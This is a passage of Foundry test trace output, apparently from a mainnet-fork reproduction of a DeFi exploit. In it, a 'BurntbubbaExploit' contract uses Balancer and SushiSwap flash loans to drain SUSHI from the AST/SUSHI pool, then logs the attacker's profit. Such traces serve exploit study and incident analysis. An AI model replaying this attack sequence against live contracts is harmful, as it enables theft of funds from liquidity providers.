    │   │   │   │   │   ├─ [624] AST::balanceOf(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 10000 [1e4]
    │   │   │   │   │   ├─ [578] SUSHI::balanceOf(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 400000000000000000000000 [4e23]
    │   │   │   │   │   ├─ [338] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x5ad6211CD3fdE39A9cECB5df6f380b8263d1e277
    │   │   │   │   │   ├─ emit Transfer(from: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], to: 0x0000000000000000000000000000000000000000, value: 63245553202367 [6.324e13])
    │   │   │   │   │   ├─ [6585] AST::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9999)
    │   │   │   │   │   │   ├─ emit Transfer(from: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9999)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000000000001f2abd → 0x00000000000000000000000000000000000000000000000000000000001f51cc
    │   │   │   │   │   │   │   @ 0xa4f1b68206ed880deebad612631f03c76c4a32d9c7f0f6c96d2043f8dd4db066: 10000 → 1
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [23225] SUSHI::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 399999999993675444679663 [3.999e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 399999999993675444679663 [3.999e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000054b40b1f7f6b4d2073ef
    │   │   │   │   │   │   │   @ 0xcb648e2982735a5b3e2da9ae1a329bc3b2bc1fa22f998d8ed49d2c6f41edbea2: 0x0000000000000000000000000000000000000000000054b40b1f852bda000000 → 0x000000000000000000000000000000000000000000000000000005c08cdf8c11
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [624] AST::balanceOf(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1
    │   │   │   │   │   ├─ [578] SUSHI::balanceOf(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 6324555320337 [6.324e12]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1, reserve1: 6324555320337 [6.324e12])
    │   │   │   │   │   ├─ emit Burn(sender: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0: 9999, amount1: 399999999993675444679663 [3.999e23], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa4f1b68206ed880deebad612631f03c76c4a32d9c7f0f6c96d2043f8dd4db066: 0x0000000000000000000000000000000000000000000000000000398580bb74bf → 0
    │   │   │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000cecb8f27f4200f3a0000000 → 0x000000000000000000000000000000000000000000000000000005c08cdf8c11
    │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000000000000398580bb78a7 → 1000
    │   │   │   │   │   │   @ 8: 0x6567bb5b0000000054b40b1f852bda0000000000000000000000000000002710 → 0x6567bb5b000000000000000005c08cdf8c110000000000000000000000000001
    │   │   │   │   │   └─ ← [Return] 9999, 399999999993675444679663 [3.999e23]
    │   │   │   │   ├─ [57986] SushiRouter::swapTokensForExactTokens(220000000000000000000 [2.2e20], 200000000000000000 [2e17], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701297987 [1.701e9])
    │   │   │   │   │   ├─ [517] 0x795065dCc9f64b5614C407a6EFDC400DA6221FB0::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2426184846043070139732998 [2.426e24], 1438080914121275919083 [1.438e21], 1701288599 [1.701e9]
    │   │   │   │   │   ├─ [8225] WETH::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x795065dCc9f64b5614C407a6EFDC400DA6221FB0, 130805601324233382 [1.308e17])
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x795065dCc9f64b5614C407a6EFDC400DA6221FB0, value: 130805601324233382 [1.308e17])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000011d7b209b992700a → 0x0000000000000000000000000000000000000000000000001006fb0960027d64
    │   │   │   │   │   │   │   @ 0x20db7a6b0cae05dc43c7588d71a84c7675222d2a6ca56a16f22ea9ae044b0146: 0x00000000000000000000000000000000000000000000004df561bc1d33aecaeb → 0x00000000000000000000000000000000000000000000004df732731d8d3ebd91
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [40933] 0x795065dCc9f64b5614C407a6EFDC400DA6221FB0::swap(220000000000000000000 [2.2e20], 0, BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   ├─ [8125] SUSHI::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 220000000000000000000 [2.2e20])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x795065dCc9f64b5614C407a6EFDC400DA6221FB0, to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 220000000000000000000 [2.2e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000054b40b1f7f6b4d2073ef → 0x0000000000000000000000000000000000000000000054bff83c81cf271073ef
    │   │   │   │   │   │   │   │   @ 0xa60c07f2aed92cf0e2ca94448542cb8f5cc91bf932d411877ec1850bf66a155f: 0x0000000000000000000000000000000000000000000201c3be79d5f09c7c1406 → 0x0000000000000000000000000000000000000000000201b7d15cd38cc28c1406
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x795065dCc9f64b5614C407a6EFDC400DA6221FB0) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2425964846043070139732998 [2.425e24]
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x795065dCc9f64b5614C407a6EFDC400DA6221FB0) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1438211719722600152465 [1.438e21]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 2425964846043070139732998 [2.425e24], reserve1: 1438211719722600152465 [1.438e21])
    │   │   │   │   │   │   ├─ emit Swap(sender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], amount0In: 0, amount1In: 130805601324233382 [1.308e17], amount0Out: 220000000000000000000 [2.2e20], amount1Out: 0, to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 9: 0x00000000000000000000000000000003757e8bd1cc4cfac366ce033e8f6870a9 → 0x000000000000000000000000000000037583849cd71c927a454674aaf848e495
    │   │   │   │   │   │   │   @ 8: 0x65679a9700000000004df561bc1d33aecaeb0000000201c3be79d5f09c7c1406 → 0x6567bb5b00000000004df732731d8d3ebd910000000201b7d15cd38cc28c1406
    │   │   │   │   │   │   │   @ 10: 0x0000000000000000000000000018a4b0b3e88fc8c6793542fcac283cdc4b41e1 → 0x0000000000000000000000000018a588a2c2d24c86223e149a179b5a9a27c5d5
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return] [130805601324233382 [1.308e17], 220000000000000000000 [2.2e20]]
    │   │   │   │   ├─ [3325] SUSHI::transfer(SushiSwap: [0xF5BCE5077908a1b7370B9ae04AdC565EBd643966], 400200000000000000000000 [4.002e23])
    │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SushiSwap: [0xF5BCE5077908a1b7370B9ae04AdC565EBd643966], value: 400200000000000000000000 [4.002e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000054bff83c81cf271073ef → 0x000000000000000000000000000000000000000000000001158e404886f073ef
    │   │   │   │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x00000000000000000000000000000000000000000000a8e78286540f86769d1a → 0x00000000000000000000000000000000000000000000fda66534959626969d1a
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [578] SUSHI::balanceOf(SushiSwap: [0xF5BCE5077908a1b7370B9ae04AdC565EBd643966]) [staticcall]
    │   │   │   │   └─ ← [Return] 1197828172300424769346842 [1.197e24]
    │   │   │   ├─ emit LogFlashLoan(param0: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], param2: 400000000000000000000000 [4e23], param3: 200000000000000000000 [2e20], param4: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1e4aa7f8d4ccddacabebc96df91cafeeb85673a80e38b72b015759028ee8b904: 0x000000000000ec32f56837e8e01e4884000000000000fd9b8da5d8f6f12205b2 → 0x000000000000ec32f56837e8e01e4884000000000000fda665349551b74205b2
    │   │   │   └─ ← [Stop]
    │   │   ├─ [4817] USDC::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 800000000 [8e8])
    │   │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 800000000 [8e8]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 800000000 [8e8])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000008ee72271 → 0x000000000000000000000000000000000000000000000000000000005f381a71
    │   │   │   │   │   @ 0x231554ca30e30e3daf1985a58abe660eac42605fd6c849ff49b261c6a9f01b7d: 0x00000000000000000000000000000000000000000000000000000bfefdf35a5c → 0x00000000000000000000000000000000000000000000000000000bff2da2625c
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [3262] WETH::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 500000000000000000 [5e17])
    │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 500000000000000000 [5e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000ad934ede588b3800e9f → 0x000000000000000000000000000000000000000000000ad93bde40e287320e9f
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000001006fb0960027d64 → 0x00000000000000000000000000000000000000000000000009169faf8c507d64
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [1315] USDC::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [delegatecall]
    │   │   │   └─ ← [Return] 13190610182748 [1.319e13]
    │   │   └─ ← [Return] 13190610182748 [1.319e13]
    │   ├─ emit FlashLoan(param0: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], param2: 800000000 [8e8], param3: 0)
    │   ├─ [534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 51230922249526167342751 [5.123e22]
    │   ├─ emit FlashLoan(param0: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], param2: 500000000000000000 [5e17], param3: 0)
    │   └─ ← [Stop]
    ├─ [1315] USDC::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 1597512305 [1.597e9]
    │   └─ ← [Return] 1597512305 [1.597e9]
    ├─ emit log_named_decimal_uint(key: "Exploiter USDC balance after attack", val: 1597512305 [1.597e9], decimals: 6)
    ├─ [534] WETH::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 654886372151164260 [6.548e17]
    ├─ emit log_named_decimal_uint(key: "Exploiter WETH balance after attack", val: 654886372151164260 [6.548e17], decimals: 18)
    ├─  storage changes:
    │   @ 0x63e9b86e27143ff0e80a14db19a5f30816350447efabf921888a755e5ad56fbe: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000000000000001f78dd
    │   @ 0x63e9b86e27143ff0e80a14db19a5f30816350447efabf921888a755e5ad56fc1: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 34.37s (32.88s CPU time)

Ran 2 test suites in 35.66s (34.92s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
